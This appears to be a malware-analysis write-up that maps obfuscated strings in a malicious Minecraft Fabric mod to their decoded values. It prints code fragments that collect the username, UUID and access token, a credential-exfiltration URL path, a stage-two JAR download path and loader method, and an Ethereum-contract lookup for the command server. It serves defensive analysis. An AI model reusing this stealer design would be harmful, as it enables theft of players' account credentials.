Helper.load() String Mappings

Every obfuscated Helper.load(int[] d1, int[] d2, 187, 67) call in the stage1-fabricmc-mod/ source mapped to its decoded plaintext string, determined by cross-referencing the equivalent line/context in the stage1-fabricmc-mod-deobfuscated/ source.

All calls use constants k1=187, k2=67.

ExampleMod.java → ModMain.java

Line 24 — JSON property key for execution environment

// Obfuscated (ExampleMod.java:24)
context.addProperty(
    Helper.load(new int[]{168, 161, 38, 217, 5, 165, 84, 216, 91, 143}, new int[]{226, 169, 104, 195, 208, 243, 244, 51, 106, 33}, 187, 67),
    ...
);
// Deobfuscated (ModMain.java:21)
context.addProperty("executionEnvironment", ...);


File	`ExampleMod.java`
Line	24
Context	First arg to `context.addProperty(...)`
Decoded	`executionEnvironment`

Line 25 — JSON property value for execution environment

// Obfuscated (ExampleMod.java:25)
Helper.load(new int[]{160, 194, 150}, new int[]{173, 55, 132}, 187, 67)
// Deobfuscated (ModMain.java:21)
"Fabric"


File	`ExampleMod.java`
Line	25
Context	Second arg to `context.addProperty(...)` — value
Decoded	`Fabric`

Line 40 — JSON key "username"

// Obfuscated (ExampleMod.java:40)
mci.addProperty(Helper.load(new int[]{45, 73, 205, 44}, new int[]{10, 188, 117, 185}, 187, 67), ses.getUsername());
// Deobfuscated (ModMain.java:35)
mci.addProperty("username", ses.getUsername());


File	`ExampleMod.java`
Line	40
Context	JSON key for Minecraft username
Decoded	`username`

Line 44 / 46 — JSON key "uuid" (used twice)

// Obfuscated (ExampleMod.java:44, 46)
mci.addProperty(Helper.load(new int[]{45, 25}, new int[]{196, 148}, 187, 67), ...);
// Deobfuscated (ModMain.java:39, 41)
mci.addProperty("uuid", ...);


File	`ExampleMod.java`
Lines	44, 46
Context	JSON key for Minecraft UUID
Decoded	`uuid`

Line 49 — JSON key "accessToken"

// Obfuscated (ExampleMod.java:49)
mci.addProperty(Helper.load(new int[]{14, 111, 253, 85, 244, 180}, new int[]{121, 13, 234, 79, 193}, 187, 67), ses.getAccessToken());
// Deobfuscated (ModMain.java:44)
mci.addProperty("accessToken", ses.getAccessToken());


File	`ExampleMod.java`
Line	49
Context	JSON key for Minecraft access token
Decoded	`accessToken`

Line 50 — JSON key "minecraftInfo"

// Obfuscated (ExampleMod.java:50)
context.add(Helper.load(new int[]{237, 118, 140, 134, 215, 11, 20}, new int[]{136, 20, 230, 100, 126, 156}, 187, 67), mci);
// Deobfuscated (ModMain.java:45)
context.add("minecraftInfo", mci);


File	`ExampleMod.java`
Line	50
Context	JSON key for the nested Minecraft info object
Decoded	`minecraftInfo`

Lines 53–58 — Ethereum contract address

// Obfuscated (ExampleMod.java:53-58)
rpc.getVerifiedText(
    Helper.load(
        new int[]{48, 172, 110, 3, 217, 94, 220, 121, 247, 189, 58, 15, 126, 192, 123, 218, 239, 212, 19, 238, 217},
        new int[]{122, 90, 99, 104, 40, 26, 43, 1, 168, 185, 242, 44, 141, 38, 89, 130, 173, 226, 38, 5, 83},
        187, 67
    )
)
// Deobfuscated (ModMain.java:47)
rpc.getVerifiedText("0x1280a841Fbc1F883365d3C83122260E0b2995B74")


File	`ExampleMod.java`
Lines	53–58
Context	Arg to `rpc.getVerifiedText()` — Ethereum contract address
Decoded	`0x1280a841Fbc1F883365d3C83122260E0b2995B74`

Line 60 — Credential exfiltration URL path

// Obfuscated (ExampleMod.java:60)
+ Helper.load(new int[]{184, 141, 104, 41, 51, 212, 44, 129, 119, 169, 54}, new int[]{181, 158, 33, 91, 23, 211, 191, 18, 17, 105}, 187, 67);
// Deobfuscated (ModMain.java:47)
+ "/api/delivery/handler"


File	`ExampleMod.java`
Line	60
Context	URL path appended to C2 domain for credential POST
Decoded	`/api/delivery/handler`

Lines 89–92 — Repeated JSON keys in payload construction

These are identical Helper.load() calls as lines 40, 44, 49, 50, reused when building the HTTP POST payload.

Line	Same as	Decoded
89	Line 40	`username`
90	Line 44	`uuid`
91	Line 49	`accessToken`
92	Line 50	`minecraftInfo`

Entrypoint.java → Main.java

Line 11 — JSON key "executionEnvironment"

// Obfuscated (Entrypoint.java:11)
Helper.load(new int[]{168, 161, 38, 217, 5, 165, 84, 216, 91, 143}, new int[]{226, 169, 104, 195, 208, 243, 244, 51, 106, 33}, 187, 67),
// Deobfuscated (Main.java:12)
"executionEnvironment",


File	`Entrypoint.java`
Line	11
Context	Same key as `ExampleMod.java:24`
Decoded	`executionEnvironment`

Line 12 — JSON value "Fabric"

// Obfuscated (Entrypoint.java:12)
Helper.load(new int[]{211, 113, 96, 217, 195, 158}, new int[]{40, 70, 149, 171, 8}, 187, 67)
// Deobfuscated (Main.java:13)
"Fabric"


File	`Entrypoint.java`
Line	12
Context	Value — note different int arrays than `ExampleMod.java:25` but same decoded result
Decoded	`Fabric`

Helper.java → StageTwoLoader.java

Lines 49–54 — Ethereum contract address

// Obfuscated (Helper.java:49-54)
load(
    new int[]{48, 172, 110, 3, 217, 94, 220, 121, 247, 189, 58, 15, 126, 192, 123, 218, 239, 212, 19, 238, 217},
    new int[]{122, 90, 99, 104, 40, 26, 43, 1, 168, 185, 242, 44, 141, 38, 89, 130, 173, 226, 38, 5, 83},
    187, 67
)
// Deobfuscated (StageTwoLoader.java:48)
"0x1280a841Fbc1F883365d3C83122260E0b2995B74"


File	`Helper.java`
Lines	49–54
Context	Ethereum contract address passed to `rpc.getVerifiedText()`
Decoded	`0x1280a841Fbc1F883365d3C83122260E0b2995B74`

Line 56 — Stage 2 JAR download URL path

// Obfuscated (Helper.java:56)
+ load(new int[]{184, 189, 228, 247, 29, 89, 97, 158, 228}, new int[]{96, 83, 243, 54, 77, 233, 110, 207}, 187, 67);
// Deobfuscated (StageTwoLoader.java:48)
+ "/files/jar/module"


File	`Helper.java`
Line	56
Context	URL path appended to C2 domain for Stage 2 JAR download
Decoded	`/files/jar/module`

Line 110 — Stage 2 main class name

// Obfuscated (Helper.java:110)
mC = loader.loadClass(load(new int[]{214, 16, 221, 23, 91, 117, 125, 184, 116}, new int[]{239, 86, 101, 157, 82, 126, 65, 17}, 187, 67));
// Deobfuscated (StageTwoLoader.java:102)
mainClass = loader.loadClass("dev.majanito.Main");


File	`Helper.java`
Line	110
Context	Class name loaded from downloaded Stage 2 JAR
Decoded	`dev.majanito.Main`

Line 128 — Stage 2 entry method name

// Obfuscated (Helper.java:128)
mC.getMethod(
    load(new int[]{75, 166, 75, 29, 75, 121, 250, 203, 135}, new int[]{123, 234, 243, 169, 126, 107, 245, 88, 144}, 187, 67),
    String.class
)
// Deobfuscated (StageTwoLoader.java:119)
mainClass.getMethod("initializeWeedhack", String.class)


File	`Helper.java`
Line	128
Context	Method name reflectively invoked on Stage 2 instance
Decoded	`initializeWeedhack`

FabricAdapter.java → RPCHelper.java

CLIENTS array — Ethereum RPC endpoint URLs (lines 16–336)

The CLIENTS string array in FabricAdapter.java (lines 15–336) maps to the plaintext array in RPCHelper.java (lines 15–48). Each Helper.load() call decodes to a public Ethereum JSON-RPC URL.

FabricAdapter.java Line	Index	Decoded String
16	0	`https://eth.llamarpc.com`
17–22	1	`https://eth.api.onfinality.io/public`
23–25	2	`https://rpc.eth.gateway.fm`
26–31	3	`https://ethereum-rpc.publicnode.com`
32–37	4	`https://eth.rpc.blxrbdn.com`
38–43	5	`https://ethereum.rpc.subquery.network/public`
44–49	6	`https://ethereum-json-rpc.stakely.io`
50–55	7	`https://ethereum-public.nodies.app`
56–61	8	`https://core.gashawk.io/rpc`
62–67	9	`https://mainnet.gateway.tenderly.co`
68–73	10	`https://ethereum-mainnet.gateway.tatum.io`
74	11	`https://eth1.lava.build`
75	12	`https://eth.meowrpc.com`
76–81	13	`https://public-eth.nownodes.io`
82–87	14	`https://rpc.mevblocker.io/fast`
88–93	15	`https://rpc.mevblocker.io/noreverts`
94–99	16	`https://rpc.mevblocker.io/fullprivacy`
100–174	17	`https://eth-mainnet.nodereal.io/v1/1659dfb40aa24bbb8153a677b98064d7`
175–180	18	`https://eth-mainnet.public.blastapi.io`
181–186	19	`https://ethereum.public.blockpi.network/v1/rpc/public`
187–298	20	`https://eth-mainnet.rpcfast.com?api_key=xbhWBI1Wkguk8SNMu1bvvLurPGLXmgwYeC4S6g2H7WdwFigZSmPWVZRxrskEQwIf`
299	21	`https://eth.drpc.org`
300–302	22	`https://eth.blockrazor.xyz`
303–308	23	`https://rpc.flashbots.net/fast`
309–314	24	`https://gateway.tenderly.co/public/mainnet`
315–317	25	`https://rpc.flashbots.net`
318	26	`https://rpc.fullsend.to`
319	27	`https://eth.merkle.io`
320–325	28	`https://api.zan.top/eth-mainnet`
326–328	29	`https://rpc.mevblocker.io`
329–334	30	`https://endpoints.omniatech.io/v1/eth/mainnet/public`
335	31	`https://1rpc.io/eth`

Line 337 — MAGIC_STRING (Ethereum function selector)

// Obfuscated (FabricAdapter.java:337)
private static final String MAGIC_STRING = Helper.load(new int[]{48, 108, 27, 44, 148}, new int[]{122, 14, 82, 162, 161}, 187, 67);
// Deobfuscated (RPCHelper.java:49)
private static final String MAGIC_STRING = "0xce6d41de";


File	`FabricAdapter.java`
Line	337
Context	`MAGIC_STRING` — Ethereum `eth_call` function selector (4 bytes)
Decoded	`0xce6d41de`

Lines 338–737 — RSA_PUBLIC_KEY (Base64-encoded RSA-2048 public key)

// Obfuscated (FabricAdapter.java:338-737)
private static final String RSA_PUBLIC_KEY = Helper.load(new int[]{234, 230, 163, ...}, new int[]{47, 82, 76, ...}, 187, 67);
// Deobfuscated (RPCHelper.java:50)
private static final String RSA_PUBLIC_KEY = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA...QIDAQAB";


File	`FabricAdapter.java`
Lines	338–737
Context	`RSA_PUBLIC_KEY` — Base64-encoded RSA-2048 public key used to verify C2 domain signature
Decoded	`MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtmNzDf4737/iYWvscWg6vQg9dHa/yUchfQY9r5htNTLZ3ZDAbqrzN93I0ctZHa27oRnkpB7XpowI4NH8eIRmaMThggpTYRXzHzLvUjhyrFFPkIOo/HI1gZF5IV7/XmvYWqgEsSpxl0iesOUlaWO5A8QlTu0QLsZAzZtzZyLj/v1XbPT02rTvZkuRhE6nzpUR4GN3Jp4Bn8zQAWdFDe17PWZxOi19uUTMPzgFj9n3h7DprwBmE3fR7IMsbiFacAoSHfqkTpEwY7A8ArK1DQ1yJXPog/PQ4aTU9gU38WC20wtct796ImZiuRYdNWcSzHda5ZbvZdvpw6RHh0zQqGVhRQIDAQAB`

Lines 762–857 — JSON-RPC request template

// Obfuscated (FabricAdapter.java:762-857)
String template = Helper.load(new int[]{158, 150, 138, 37, ...}, new int[]{242, 92, 167, 116, ...}, 187, 67);
// Deobfuscated (RPCHelper.java:75)
String template = "{\"jsonrpc\":\"2.0\",\"method\":\"eth_call\",\"params\":[{\"to\":\"%s\",\"data\":\"%s\"},\"latest\"],\"id\":1}";


File	`FabricAdapter.java`
Lines	762–857
Context	`template` variable in `callGetText()` — Ethereum JSON-RPC request body
Decoded	`{"jsonrpc":"2.0","method":"eth_call","params":[{"to":"%s","data":"%s"},"latest"],"id":1}`

Line 862 — HTTP header name "Content-Type"

// Obfuscated (FabricAdapter.java:862)
.header(Helper.load(new int[]{216, 221, 38, 245, 236, 20}, new int[]{35, 145, 11, 90, 181, 6}, 187, 67), ...)
// Deobfuscated (RPCHelper.java:79)
.header("Content-Type", ...)


File	`FabricAdapter.java`
Line	862
Context	HTTP header name
Decoded	`Content-Type`

Line 863 — HTTP header value "application/json"

// Obfuscated (FabricAdapter.java:863)
Helper.load(new int[]{14, 196, 139, 249, 205, 255, 248, 137}, new int[]{252, 42, 153, 165, 138, 245, 165, 98}, 187, 67)
// Deobfuscated (RPCHelper.java:79)
"application/json"


File	`FabricAdapter.java`
Line	863
Context	HTTP header value
Decoded	`application/json`

Line 869 — JSON response search string `"result":"`

// Obfuscated (FabricAdapter.java:869)
int start = body.indexOf(Helper.load(new int[]{7, 24, 93, 96, 71}, new int[]{91, 210, 158, 167, 7}, 187, 67));
// Deobfuscated (RPCHelper.java:84)
int start = body.indexOf("\"result\":\"");


File	`FabricAdapter.java`
Line	869
Context	Search string to find the result field in RPC JSON response
Decoded	`"result":"`

Line 871 — Exception message

// Obfuscated (FabricAdapter.java:871)
throw new Exception(Helper.load(new int[]{229, 36, 102, 24, 217}, new int[]{30, 209, 113, 106, 153}, 187, 67));
// Deobfuscated (RPCHelper.java:86)
throw new Exception("No result\"");


File	`FabricAdapter.java`
Line	871
Context	Exception thrown when RPC response has no `result` field
Decoded	`No result"`

Line 880 — Hex prefix "0x"

// Obfuscated (FabricAdapter.java:880)
String data = hexData.startsWith(Helper.load(new int[]{48}, new int[]{122}, 187, 67)) ? hexData.substring(2) : hexData;
// Deobfuscated (RPCHelper.java:95)
String data = hexData.startsWith("0x") ? hexData.substring(2) : hexData;


File	`FabricAdapter.java`
Line	880
Context	Hex prefix check for ABI-encoded RPC return data
Decoded	`0x`

Line 905 — KeyFactory algorithm "RSA"

// Obfuscated (FabricAdapter.java:905)
KeyFactory.getInstance(Helper.load(new int[]{132, 215}, new int[]{3}, 187, 67))
// Deobfuscated (RPCHelper.java:120)
KeyFactory.getInstance("RSA")


File	`FabricAdapter.java`
Line	905
Context	Cryptographic algorithm for key factory
Decoded	`RSA`

Line 906 — Signature algorithm "SHA256withRSA"

// Obfuscated (FabricAdapter.java:906)
Signature.getInstance(Helper.load(new int[]{93, 115, 42, 29, 26, 222, 44}, new int[]{167, 133, 137, 169, 36, 135}, 187, 67))
// Deobfuscated (RPCHelper.java:121)
Signature.getInstance("SHA256withRSA")


File	`FabricAdapter.java`
Line	906
Context	Signature verification algorithm
Decoded	`SHA256withRSA`

Summary Table

All unique decoded strings across the entire obfuscated codebase:

#	Decoded String	Files & Lines (obfuscated)	Usage
1	`executionEnvironment`	`ExampleMod.java:24`, `Entrypoint.java:11`	JSON key
2	`Fabric`	`ExampleMod.java:25`, `Entrypoint.java:12`	JSON value
3	`username`	`ExampleMod.java:40,89`	JSON key — Minecraft username
4	`uuid`	`ExampleMod.java:44,46,90`	JSON key — Minecraft UUID
5	`accessToken`	`ExampleMod.java:49,91`	JSON key — Minecraft access token
6	`minecraftInfo`	`ExampleMod.java:50,92`	JSON key — nested MC info object
7	`0x1280a841Fbc1F883365d3C83122260E0b2995B74`	`ExampleMod.java:53–58`, `Helper.java:49–54`	Ethereum contract address
8	`/api/delivery/handler`	`ExampleMod.java:60`	C2 credential exfil URL path
9	`/files/jar/module`	`Helper.java:56`	C2 Stage 2 download URL path
10	`dev.majanito.Main`	`Helper.java:110`	Stage 2 class name
11	`initializeWeedhack`	`Helper.java:128`	Stage 2 method name
12	`https://eth.llamarpc.com`	`FabricAdapter.java:16`	RPC endpoint [0]
13	`https://eth.api.onfinality.io/public`	`FabricAdapter.java:17–22`	RPC endpoint [1]
14	`https://rpc.eth.gateway.fm`	`FabricAdapter.java:23–25`	RPC endpoint [2]
15	`https://ethereum-rpc.publicnode.com`	`FabricAdapter.java:26–31`	RPC endpoint [3]
16	`https://eth.rpc.blxrbdn.com`	`FabricAdapter.java:32–37`	RPC endpoint [4]
17	`https://ethereum.rpc.subquery.network/public`	`FabricAdapter.java:38–43`	RPC endpoint [5]
18	`https://ethereum-json-rpc.stakely.io`	`FabricAdapter.java:44–49`	RPC endpoint [6]
19	`https://ethereum-public.nodies.app`	`FabricAdapter.java:50–55`	RPC endpoint [7]
20	`https://core.gashawk.io/rpc`	`FabricAdapter.java:56–61`	RPC endpoint [8]
21	`https://mainnet.gateway.tenderly.co`	`FabricAdapter.java:62–67`	RPC endpoint [9]
22	`https://ethereum-mainnet.gateway.tatum.io`	`FabricAdapter.java:68–73`	RPC endpoint [10]
23	`https://eth1.lava.build`	`FabricAdapter.java:74`	RPC endpoint [11]
24	`https://eth.meowrpc.com`	`FabricAdapter.java:75`	RPC endpoint [12]
25	`https://public-eth.nownodes.io`	`FabricAdapter.java:76–81`	RPC endpoint [13]
26	`https://rpc.mevblocker.io/fast`	`FabricAdapter.java:82–87`	RPC endpoint [14]
27	`https://rpc.mevblocker.io/noreverts`	`FabricAdapter.java:88–93`	RPC endpoint [15]
28	`https://rpc.mevblocker.io/fullprivacy`	`FabricAdapter.java:94–99`	RPC endpoint [16]
29	`https://eth-mainnet.nodereal.io/v1/1659dfb40aa24bbb8153a677b98064d7`	`FabricAdapter.java:100–174`	RPC endpoint [17]
30	`https://eth-mainnet.public.blastapi.io`	`FabricAdapter.java:175–180`	RPC endpoint [18]
31	`https://ethereum.public.blockpi.network/v1/rpc/public`	`FabricAdapter.java:181–186`	RPC endpoint [19]
32	`https://eth-mainnet.rpcfast.com?api_key=xbhWBI1Wkguk8SNMu1bvvLurPGLXmgwYeC4S6g2H7WdwFigZSmPWVZRxrskEQwIf`	`FabricAdapter.java:187–298`	RPC endpoint [20]
33	`https://eth.drpc.org`	`FabricAdapter.java:299`	RPC endpoint [21]
34	`https://eth.blockrazor.xyz`	`FabricAdapter.java:300–302`	RPC endpoint [22]
35	`https://rpc.flashbots.net/fast`	`FabricAdapter.java:303–308`	RPC endpoint [23]
36	`https://gateway.tenderly.co/public/mainnet`	`FabricAdapter.java:309–314`	RPC endpoint [24]
37	`https://rpc.flashbots.net`	`FabricAdapter.java:315–317`	RPC endpoint [25]
38	`https://rpc.fullsend.to`	`FabricAdapter.java:318`	RPC endpoint [26]
39	`https://eth.merkle.io`	`FabricAdapter.java:319`	RPC endpoint [27]
40	`https://api.zan.top/eth-mainnet`	`FabricAdapter.java:320–325`	RPC endpoint [28]
41	`https://rpc.mevblocker.io`	`FabricAdapter.java:326–328`	RPC endpoint [29]
42	`https://endpoints.omniatech.io/v1/eth/mainnet/public`	`FabricAdapter.java:329–334`	RPC endpoint [30]
43	`https://1rpc.io/eth`	`FabricAdapter.java:335`	RPC endpoint [31]
44	`0xce6d41de`	`FabricAdapter.java:337`	Ethereum function selector
45	`MIIBIjANBgkqhkiG9w0BAQE...QIDAQAB`	`FabricAdapter.java:338–737`	RSA-2048 public key (Base64)
46	`{"jsonrpc":"2.0","method":"eth_call","params":[{"to":"%s","data":"%s"},"latest"],"id":1}`	`FabricAdapter.java:762–857`	JSON-RPC request template
47	`Content-Type`	`FabricAdapter.java:862`	HTTP header name
48	`application/json`	`FabricAdapter.java:863`	HTTP header value
49	`"result":"`	`FabricAdapter.java:869`	JSON response parser search string
50	`No result"`	`FabricAdapter.java:871`	Exception message
51	`0x`	`FabricAdapter.java:880`	Hex prefix
52	`RSA`	`FabricAdapter.java:905`	KeyFactory algorithm
53	`SHA256withRSA`	`FabricAdapter.java:906`	Signature algorithm

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Helper.load() String Mappings

ExampleMod.java → ModMain.java

Line 24 — JSON property key for execution environment

Line 25 — JSON property value for execution environment

Line 40 — JSON key "username"

Line 44 / 46 — JSON key "uuid" (used twice)

Line 49 — JSON key "accessToken"

Line 50 — JSON key "minecraftInfo"

Lines 53–58 — Ethereum contract address

Line 60 — Credential exfiltration URL path

Lines 89–92 — Repeated JSON keys in payload construction

Entrypoint.java → Main.java

Line 11 — JSON key "executionEnvironment"

Line 12 — JSON value "Fabric"

Helper.java → StageTwoLoader.java

Lines 49–54 — Ethereum contract address

Line 56 — Stage 2 JAR download URL path

Line 110 — Stage 2 main class name

Line 128 — Stage 2 entry method name

FabricAdapter.java → RPCHelper.java

CLIENTS array — Ethereum RPC endpoint URLs (lines 16–336)

Line 337 — MAGIC_STRING (Ethereum function selector)

Lines 338–737 — RSA_PUBLIC_KEY (Base64-encoded RSA-2048 public key)

Lines 762–857 — JSON-RPC request template

Line 862 — HTTP header name "Content-Type"

Line 863 — HTTP header value "application/json"

Line 869 — JSON response search string `"result":"`

Line 871 — Exception message

Line 880 — Hex prefix "0x"

Line 905 — KeyFactory algorithm "RSA"

Line 906 — Signature algorithm "SHA256withRSA"

Summary Table

FilesExpand file tree

MAPPINGS.md

Latest commit

History

MAPPINGS.md

File metadata and controls

Helper.load() String Mappings

ExampleMod.java → ModMain.java

Line 24 — JSON property key for execution environment

Line 25 — JSON property value for execution environment

Line 40 — JSON key "username"

Line 44 / 46 — JSON key "uuid" (used twice)

Line 49 — JSON key "accessToken"

Line 50 — JSON key "minecraftInfo"

Lines 53–58 — Ethereum contract address

Line 60 — Credential exfiltration URL path

Lines 89–92 — Repeated JSON keys in payload construction

Entrypoint.java → Main.java

Line 11 — JSON key "executionEnvironment"

Line 12 — JSON value "Fabric"

Helper.java → StageTwoLoader.java

Lines 49–54 — Ethereum contract address

Line 56 — Stage 2 JAR download URL path

Line 110 — Stage 2 main class name

Line 128 — Stage 2 entry method name

FabricAdapter.java → RPCHelper.java

CLIENTS array — Ethereum RPC endpoint URLs (lines 16–336)

Line 337 — MAGIC_STRING (Ethereum function selector)

Lines 338–737 — RSA_PUBLIC_KEY (Base64-encoded RSA-2048 public key)

Lines 762–857 — JSON-RPC request template

Line 862 — HTTP header name "Content-Type"

Line 863 — HTTP header value "application/json"

Line 869 — JSON response search string "result":"

Line 871 — Exception message

Line 880 — Hex prefix "0x"

Line 905 — KeyFactory algorithm "RSA"

Line 906 — Signature algorithm "SHA256withRSA"

Summary Table

Line 869 — JSON response search string `"result":"`